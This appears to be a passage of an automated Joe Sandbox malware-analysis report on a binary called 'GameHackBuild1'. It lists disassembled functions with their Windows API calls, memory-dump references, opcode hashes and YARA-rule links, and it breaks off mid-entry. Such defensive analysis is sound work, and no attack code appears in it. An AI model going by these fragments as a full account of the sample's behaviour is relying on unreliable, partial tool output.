                                      Download Yara Rule
                                      APIs
                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00A09E76
                                      • GetLastError.KERNEL32 ref: 00A09E82
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastPointer
                                      • String ID:
                                      • API String ID: 2976181284-0
                                      • Opcode ID: 445cfb6c3a4626f1c116fdd05bc34aff2029b565753bd578b96e986882121fbd
                                      • Instruction ID: 7cc91a3dd100ae3f23e1fa2914ad97bc10fa014ca07f0fa84aee11db3aa3dda2
                                      • Opcode Fuzzy Hash: 445cfb6c3a4626f1c116fdd05bc34aff2029b565753bd578b96e986882121fbd
                                      • Instruction Fuzzy Hash: B901B1723043085BEB34DF69ED44B6BB7D99B89318F14493EB146C36D1DA35EC488610
                                      Function 00A28606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00A28627
                                        • Part of subcall function 00A28518: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A23A26,?,0000015D,?,?,?,?,00A24F02,000000FF,00000000,?,?), ref: 00A2854A
                                      • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00A40F50,00A0CE57,?,?,?,?,?,?), ref: 00A28663
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Heap$AllocAllocate_free
                                      • String ID:
                                      • API String ID: 2447670028-0
                                      • Opcode ID: 9ca28524c0846f0d3848a6d8be4e9dff3b81e631ab4e19b1bf5a09f76598b2ac
                                      • Instruction ID: d162a57f34e01be65d9722543fb5c62405149a8ee4ab9a97b030edd26098ef27
                                      • Opcode Fuzzy Hash: 9ca28524c0846f0d3848a6d8be4e9dff3b81e631ab4e19b1bf5a09f76598b2ac
                                      • Instruction Fuzzy Hash: 1FF062321071356ADB312B6DBD00F6F6B689F91BB1F248135F81496591EF2CC90195A5
                                      Function 00A10908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?), ref: 00A10915
                                      • GetProcessAffinityMask.KERNEL32(00000000), ref: 00A1091C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Process$AffinityCurrentMask
                                      • String ID:
                                      • API String ID: 1231390398-0
                                      • Opcode ID: 4e6dafe33faba6ea6bdae204db22448c43c3afd9cb697336e26e3f754753e30e
                                      • Instruction ID: 4bfdde910eed03b0f659baf64f53adc2ee80fd3bf6d412960b4af03f4730ec80
                                      • Opcode Fuzzy Hash: 4e6dafe33faba6ea6bdae204db22448c43c3afd9cb697336e26e3f754753e30e
                                      • Instruction Fuzzy Hash: ECE09233A14109AB6F09CBB49C14CFB73ADEB052107204179B807D7201F970DEC186A4
                                      Function 00A0A444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00A0A27A,?,?,?,00A0A113,?,00000001,00000000,?,?), ref: 00A0A458
                                      • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00A0A27A,?,?,?,00A0A113,?,00000001,00000000,?,?), ref: 00A0A489
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: c0a944d2999a3eb6eb22c2c4501f275ead79096c1f10b5d3cdc5274ce26b2cc2
                                      • Instruction ID: b4951cf3841726aa4705f8cb16c09a5fc5b5e36e79c0b5e2838ef4c007fcdba7
                                      • Opcode Fuzzy Hash: c0a944d2999a3eb6eb22c2c4501f275ead79096c1f10b5d3cdc5274ce26b2cc2
                                      • Instruction Fuzzy Hash: 20F0A03524520D7BEF019F60EC45FD9776CBB04382F04C051BC88861A1DB728AA9AA50
                                      Function 00A1D573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ItemText_swprintf
                                      • String ID:
                                      • API String ID: 3011073432-0
                                      • Opcode ID: a627c41a30b1fe09790c90cf25cae69158a51a19e7ec1a1fc3978c3ac1181282
                                      • Instruction ID: 63d9db9a65ee2572177c6765f1257c2aec3406888f5dbee2b4d72a1cbff3c1ac
                                      • Opcode Fuzzy Hash: a627c41a30b1fe09790c90cf25cae69158a51a19e7ec1a1fc3978c3ac1181282
                                      • Instruction Fuzzy Hash: D8F05C7250034C3ADB11EFF0AC02FDD372DAB05345F000541B700630E2D9766A904761
                                      Function 00A0A12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteFileW.KERNELBASE(?,?,?,00A0984C,?,?,00A09688,?,?,?,?,00A31FA1,000000FF), ref: 00A0A13E
                                      • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00A0984C,?,?,00A09688,?,?,?,?,00A31FA1,000000FF), ref: 00A0A16C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: DeleteFile
                                      • String ID:
                                      • API String ID: 4033686569-0
                                      • Opcode ID: e9244fe61b6cffa51f356e87d2c210a8dc4b6b7a48a67fb53aa0f1d430236f0e
                                      • Instruction ID: b3976234d5277b83adf5d0eb314edaa5d1a37aeecf114238a62a59922497ca5d
                                      • Opcode Fuzzy Hash: e9244fe61b6cffa51f356e87d2c210a8dc4b6b7a48a67fb53aa0f1d430236f0e
                                      • Instruction Fuzzy Hash: F7E0923564020C6BDB119F60EC81FE9776CAB09382F484065BC88C70A0DB729ED5AAA0
                                      Function 00A1A39D Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                      • GdiplusShutdown.GDIPLUS(?,?,?,?,00A31FA1,000000FF), ref: 00A1A3D1
                                      • CoUninitialize.COMBASE(?,?,?,?,00A31FA1,000000FF), ref: 00A1A3D6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: GdiplusShutdownUninitialize
                                      • String ID:
                                      • API String ID: 3856339756-0
                                      • Opcode ID: e756f64e0b1789334938069cccd33378c30585872853de33e3c96f5b31511fc0
                                      • Instruction ID: e985f91eeba5347b6c6af85c320a3f0192371e62a3cb9fa23ba4449ff6b935f1
                                      • Opcode Fuzzy Hash: e756f64e0b1789334938069cccd33378c30585872853de33e3c96f5b31511fc0
                                      • Instruction Fuzzy Hash: D2F06536618654EFC711EB8DDD05B59FBACFB89B20F04436AF41983760CB796801CB91
                                      Function 00A0A194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,?,?,00A0A189,?,00A076B2,?,?,?,?), ref: 00A0A1A5
                                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00A0A189,?,00A076B2,?,?,?,?), ref: 00A0A1D1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: a79c3d6cefd96520125fc3ec4687be2c4ead6d32e30b6d788d6d27c0ad8ec870
                                      • Instruction ID: 0cb391f45c13212c08921975480d2407f5716635d84a655a9bec92ef5246d309
                                      • Opcode Fuzzy Hash: a79c3d6cefd96520125fc3ec4687be2c4ead6d32e30b6d788d6d27c0ad8ec870
                                      • Instruction Fuzzy Hash: F6E0923650412C5BDB20EBA8EC05BD9B76CEB193E1F0042A1FD54E32D0D7719E889AE0
                                      Function 00A10085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A100A0
                                      • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A0EB86,Crypt32.dll,00000000,00A0EC0A,?,?,00A0EBEC,?,?,?), ref: 00A100C2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: DirectoryLibraryLoadSystem
                                      • String ID:
                                      • API String ID: 1175261203-0
                                      • Opcode ID: 28f483cb892716de1aa53c2dbbef7820443853471ac353f836d0697d3de096fd
                                      • Instruction ID: fd53295b228298318e5133aec13cdd2f7f57f17375b3252eba0e3c4c86214460
                                      • Opcode Fuzzy Hash: 28f483cb892716de1aa53c2dbbef7820443853471ac353f836d0697d3de096fd
                                      • Instruction Fuzzy Hash: 7FE0127691511C6ADB21DBA4AD05FD6776CEF0D3D2F0400A5B948D3144DA749A848BB0
                                      Function 00A19B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00A19B30
                                      • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00A19B37
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: BitmapCreateFromGdipStream
                                      • String ID:
                                      • API String ID: 1918208029-0
                                      • Opcode ID: cc69bf926306d5ea78991c47b83e4fddf463c6d41561619a8bcf7556723f77ca
                                      • Instruction ID: 6ae6590c7325384e959b9a753b51cd75cb8670911b71b845ca9e5a8c0e2e3ed5
                                      • Opcode Fuzzy Hash: cc69bf926306d5ea78991c47b83e4fddf463c6d41561619a8bcf7556723f77ca
                                      • Instruction Fuzzy Hash: BDE0ED71905218EBCB10DF99D5016DAB7FCEB09721F10805BEC9593200D771AE44DB95
                                      Function 00A2215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A2329A: try_get_function.LIBVCRUNTIME ref: 00A232AF
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A2217A
                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00A22185
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                      • String ID:
                                      • API String ID: 806969131-0
                                      • Opcode ID: 9890e11b73e963c6270ea6b8fbaecfae397822bcc76e76a92b908fef513974e6
                                      • Instruction ID: b56460a8177038bde09c491b7b9cbb9cd58000526d6ce81b948839eaced45176
                                      • Opcode Fuzzy Hash: 9890e11b73e963c6270ea6b8fbaecfae397822bcc76e76a92b908fef513974e6
                                      • Instruction Fuzzy Hash: FBD0A936608372343D08A7BC3E43FA823646862BB43F00B76F7208A0E1EF1481216312
                                      Function 00A1DC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • DloadLock.DELAYIMP ref: 00A1DC73
                                      • DloadProtectSection.DELAYIMP ref: 00A1DC8F
                                        • Part of subcall function 00A1DE67: DloadObtainSection.DELAYIMP ref: 00A1DE77
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Dload$Section$LockObtainProtect
                                      • String ID:
                                      • API String ID: 731663317-0
                                      • Opcode ID: e28f39b0a1eb8bb9c0b46218c38ee9c77dd4a92407240c3467f4ddc0f33ca903
                                      • Instruction ID: 59d1157c036534041a7e93c8f8a82e476e1d2309d1e1b08a787f85e38fee7dbf
                                      • Opcode Fuzzy Hash: e28f39b0a1eb8bb9c0b46218c38ee9c77dd4a92407240c3467f4ddc0f33ca903
                                      • Instruction Fuzzy Hash: BDD012745402015EC715EBB49E46BDD3371B704744FA40A05F105C70A0DFF458C2C645
                                      Function 00A012E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ItemShowWindow
                                      • String ID:
                                      • API String ID: 3351165006-0
                                      • Opcode ID: 84b5016c48c8f60ee9b3c103c27de8e4a7233582ccffa20002621144fd724336
                                      • Instruction ID: 6e86f7dbc1882c7d0e13873d9128d433185ea3240b822aeb1a9a19eacebedcac
                                      • Opcode Fuzzy Hash: 84b5016c48c8f60ee9b3c103c27de8e4a7233582ccffa20002621144fd724336
                                      • Instruction Fuzzy Hash: 24C0123205C600BFCB018BB0DC09E2FBBB8ABA6212F05CA08F2A5C0060C238C010DB11
                                      Function 00A019A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 2b1938a9292511d8463889ce930c26921b249c5f72a6a72449c61065b95db6a5
                                      • Instruction ID: 09071069a4f9ac27c181f667397d7505f5f68d2549a11b7adce8d45213503bd3
                                      • Opcode Fuzzy Hash: 2b1938a9292511d8463889ce930c26921b249c5f72a6a72449c61065b95db6a5
                                      • Instruction Fuzzy Hash: C1C1B130A042489FEF15CFA8D894BE97BE5EF1A314F0844B9EC46DB2C6CB759944CB61
                                      Function 00A03B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: ca5648fef2b8ec46c6c9c7d906f396526f110ebd56ab31e480fa9bea4441141c
                                      • Instruction ID: 1d056761386810e30c66f2dbdd6ed4b3a6cc9d7e6c124aafd18adef919c09b92
                                      • Opcode Fuzzy Hash: ca5648fef2b8ec46c6c9c7d906f396526f110ebd56ab31e480fa9bea4441141c
                                      • Instruction Fuzzy Hash: 6F71AE72504F48AEDF25DB30DD51AE7B7E8AF14301F444D6EE5AB87182DA316A48DF10
                                      Function 00A0837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A08384
                                        • Part of subcall function 00A01380: __EH_prolog.LIBCMT ref: 00A01385
                                        • Part of subcall function 00A01380: new.LIBCMT ref: 00A013FE
                                        • Part of subcall function 00A019A6: __EH_prolog.LIBCMT ref: 00A019AB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 374d68acb7a64be883447aa92d146da405ed0d7c026174f2fd5f56ce14f93564
                                      • Instruction ID: 262b34e92be7fb9eb16ad6b900ff925b437ef759b8c421f71ece74ab21c4fcc5
                                      • Opcode Fuzzy Hash: 374d68acb7a64be883447aa92d146da405ed0d7c026174f2fd5f56ce14f93564
                                      • Instruction Fuzzy Hash: BA41C33184065C9ADF20DB60ED55BEA73B8AF50310F0440EAE58AA70D3DF795EC8DB54
                                      Function 00A12E6D Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
